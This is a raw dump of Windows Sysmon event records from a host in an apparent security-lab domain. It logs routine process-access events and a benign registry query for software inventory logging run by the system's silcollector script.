13:34:59.557{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003034Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.557{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003033Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.557{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003032Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.557{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003031Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.557{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003030Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.557{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E83-6005-8A00-00000000A301}4388C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003029Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.557{59A5CD1D-8E83-6005-8900-00000000A301}43684372C:\Windows\system32\cmd.exe{59A5CD1D-8E83-6005-8A00-00000000A301}4388C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003028Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.557{59A5CD1D-8E83-6005-8A00-00000000A301}4388C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exeC:\Windows\system32\reg.exe query hklm\software\microsoft\windows\softwareinventorylogging /v collectionstate /reg:64C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{59A5CD1D-8E83-6005-8900-00000000A301}4368C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\system32\reg.exe query hklm\software\microsoft\windows\softwareinventorylogging /v collectionstate /reg:64 10341000x80000000000000003027Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.542{59A5CD1D-8E83-6005-8800-00000000A301}43044344C:\Windows\system32\conhost.exe{59A5CD1D-8E83-6005-8900-00000000A301}4368C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003026Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.542{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003025Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.542{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003024Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.542{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003023Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.542{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003022Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.542{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003021Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.542{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003020Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.542{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003019Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.542{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003018Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.542{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003017Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.542{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E83-6005-8900-00000000A301}4368C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003016Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.542{59A5CD1D-8E83-6005-8700-00000000A301}43284308C:\Windows\system32\cmd.exe{59A5CD1D-8E83-6005-8900-00000000A301}4368C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\msvcrt.dll+4ba7c|C:\Windows\system32\cmd.exe+103c4|C:\Windows\system32\cmd.exe+10910|C:\Windows\system32\cmd.exe+c36d|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003015Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.549{59A5CD1D-8E83-6005-8900-00000000A301}4368C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c C:\Windows\system32\reg.exe query hklm\software\microsoft\windows\softwareinventorylogging /v collectionstate /reg:64C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E83-6005-8700-00000000A301}4328C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /d /c C:\Windows\system32\silcollector.cmd configure 10341000x80000000000000003014Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.511{59A5CD1D-8E46-6005-1400-00000000A301}13042544C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003013Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.511{59A5CD1D-8E83-6005-8800-00000000A301}43044344C:\Windows\system32\conhost.exe{59A5CD1D-8E83-6005-8700-00000000A301}4328C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003012Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.511{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E83-6005-8800-00000000A301}4304C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003011Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.511{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003010Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.511{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003009Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.511{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003008Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:59.511{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 